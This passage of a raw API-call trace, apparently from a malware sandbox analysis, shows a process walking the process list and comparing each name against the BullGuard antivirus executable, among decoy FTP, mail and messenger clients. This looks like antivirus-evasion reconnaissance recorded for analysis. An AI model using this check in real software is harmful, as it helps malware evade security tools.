th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.701] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.702] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.703] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.703] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.704] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.705] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.705] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.706] lstrcmpiW (lpString1="spoolsv.exe", lpString2="BullGuardCore.exe") returned 1 [0173.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0173.707] lstrcmpiW (lpString1="sihost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.707] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0173.712] lstrcmpiW (lpString1="SkypeHost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0173.713] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="BullGuardCore.exe") returned 1 [0173.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0x764, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.713] lstrcmpiW (lpString1="explorer.exe", lpString2="BullGuardCore.exe") returned 1 [0173.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0173.714] lstrcmpiW (lpString1="RuntimeBroker.exe", lpString2="BullGuardCore.exe") returned 1 [0173.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.715] lstrcmpiW (lpString1="taskhostw.exe", lpString2="BullGuardCore.exe") returned 1 [0173.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0173.716] lstrcmpiW (lpString1="ShellExperienceHost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0173.716] lstrcmpiW (lpString1="SearchUI.exe", lpString2="BullGuardCore.exe") returned 1 [0173.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.718] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.719] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="BullGuardCore.exe") returned 1 [0173.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x274, pcPriClassBase=10, dwFlags=0x0, szExeFile="SystemSettingsBroker.exe")) returned 1 [0173.720] lstrcmpiW (lpString1="SystemSettingsBroker.exe", lpString2="BullGuardCore.exe") returned 1 [0173.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0173.721] lstrcmpiW (lpString1="WMIADAP.exe", lpString2="BullGuardCore.exe") returned 1 [0173.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.721] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="BullGuardCore.exe") returned 1 [0173.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0173.722] lstrcmpiW (lpString1="iexplore.exe", lpString2="BullGuardCore.exe") returned 1 [0173.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="according.exe")) returned 1 [0173.723] lstrcmpiW (lpString1="according.exe", lpString2="BullGuardCore.exe") returned -1 [0173.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="areaspaceanother.exe")) returned 1 [0173.724] lstrcmpiW (lpString1="areaspaceanother.exe", lpString2="BullGuardCore.exe") returned -1 [0173.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="weight-employee.exe")) returned 1 [0173.724] lstrcmpiW (lpString1="weight-employee.exe", lpString2="BullGuardCore.exe") returned 1 [0173.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cellresource.exe")) returned 1 [0173.725] lstrcmpiW (lpString1="cellresource.exe", lpString2="BullGuardCore.exe") returned 1 [0173.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="firm_against_member.exe")) returned 1 [0173.726] lstrcmpiW (lpString1="firm_against_member.exe", lpString2="BullGuardCore.exe") returned 1 [0173.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="listen_art.exe")) returned 1 [0173.726] lstrcmpiW (lpString1="listen_art.exe", lpString2="BullGuardCore.exe") returned 1 [0173.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="animallikely.exe")) returned 1 [0173.727] lstrcmpiW (lpString1="animallikely.exe", lpString2="BullGuardCore.exe") returned -1 [0173.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strategy-approach-thousand.exe")) returned 1 [0173.728] lstrcmpiW (lpString1="strategy-approach-thousand.exe", lpString2="BullGuardCore.exe") returned 1 [0173.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsibility.exe")) returned 1 [0173.729] lstrcmpiW (lpString1="responsibility.exe", lpString2="BullGuardCore.exe") returned 1 [0173.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sea.exe")) returned 1 [0173.729] lstrcmpiW (lpString1="sea.exe", lpString2="BullGuardCore.exe") returned 1 [0173.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen_sea_answer.exe")) returned 1 [0173.748] lstrcmpiW (lpString1="kitchen_sea_answer.exe", lpString2="BullGuardCore.exe") returned 1 [0173.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="official.exe")) returned 1 [0173.750] lstrcmpiW (lpString1="official.exe", lpString2="BullGuardCore.exe") returned 1 [0173.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="southern_who_police.exe")) returned 1 [0173.751] lstrcmpiW (lpString1="southern_who_police.exe", lpString2="BullGuardCore.exe") returned 1 [0173.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="administration somebody few.exe")) returned 1 [0173.752] lstrcmpiW (lpString1="administration somebody few.exe", lpString2="BullGuardCore.exe") returned -1 [0173.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="white_effort_certain.exe")) returned 1 [0173.754] lstrcmpiW (lpString1="white_effort_certain.exe", lpString2="BullGuardCore.exe") returned 1 [0173.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x424, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="test_two.exe")) returned 1 [0173.755] lstrcmpiW (lpString1="test_two.exe", lpString2="BullGuardCore.exe") returned 1 [0173.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watch reveal.exe")) returned 1 [0173.756] lstrcmpiW (lpString1="watch reveal.exe", lpString2="BullGuardCore.exe") returned 1 [0173.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="restratedegree.exe")) returned 1 [0173.757] lstrcmpiW (lpString1="restratedegree.exe", lpString2="BullGuardCore.exe") returned 1 [0173.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sign_he.exe")) returned 1 [0173.758] lstrcmpiW (lpString1="sign_he.exe", lpString2="BullGuardCore.exe") returned 1 [0173.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0173.759] lstrcmpiW (lpString1="3dftp.exe", lpString2="BullGuardCore.exe") returned -1 [0173.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0173.760] lstrcmpiW (lpString1="absolutetelnet.exe", lpString2="BullGuardCore.exe") returned -1 [0173.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0173.761] lstrcmpiW (lpString1="alftp.exe", lpString2="BullGuardCore.exe") returned -1 [0173.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0173.762] lstrcmpiW (lpString1="barca.exe", lpString2="BullGuardCore.exe") returned -1 [0173.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0173.764] lstrcmpiW (lpString1="bitkinex.exe", lpString2="BullGuardCore.exe") returned -1 [0173.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0173.766] lstrcmpiW (lpString1="coreftp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0173.767] lstrcmpiW (lpString1="far.exe", lpString2="BullGuardCore.exe") returned 1 [0173.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0173.769] lstrcmpiW (lpString1="filezilla.exe", lpString2="BullGuardCore.exe") returned 1 [0173.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0173.770] lstrcmpiW (lpString1="flashfxp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0173.772] lstrcmpiW (lpString1="fling.exe", lpString2="BullGuardCore.exe") returned 1 [0173.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0173.774] lstrcmpiW (lpString1="gmailnotifierpro.exe", lpString2="BullGuardCore.exe") returned 1 [0173.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0173.776] lstrcmpiW (lpString1="icq.exe", lpString2="BullGuardCore.exe") returned 1 [0173.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0173.777] lstrcmpiW (lpString1="leechftp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0173.779] lstrcmpiW (lpString1="ncftp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0173.780] lstrcmpiW (lpString1="notepad.exe", lpString2="BullGuardCore.exe") returned 1 [0173.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0173.782] lstrcmpiW (lpString1="operamail.exe", lpString2="BullGuardCore.exe") returned 1 [0173.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0173.794] lstrcmpiW (lpString1="outlook.exe", lpString2="BullGuardCore.exe") returned 1 [0173.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0173.837] lstrcmpiW (lpString1="pidgin.exe", lpString2="BullGuardCore.exe") returned 1 [0173.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0173.843] lstrcmpiW (lpString1="scriptftp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0173.847] lstrcmpiW (lpString1="skype.exe", lpString2="BullGuardCore.exe") returned 1 [0173.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0173.848] lstrcmpiW (lpString1="smartftp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0173.850] lstrcmpiW (lpString1="thunderbird.exe", lpString2="BullGuardCore.exe") returned 1 [0173.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0173.851] lstrcmpiW (lpString1="trillian.exe", lpString2="BullGuardCore.exe") returned 1 [0173.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0173.853] lstrcmpiW (lpString1="webdrive.exe", lpString2="BullGuardCore.exe") returned 1 [0173.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0173.855] lstrcmpiW (lpString1="whatsapp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, 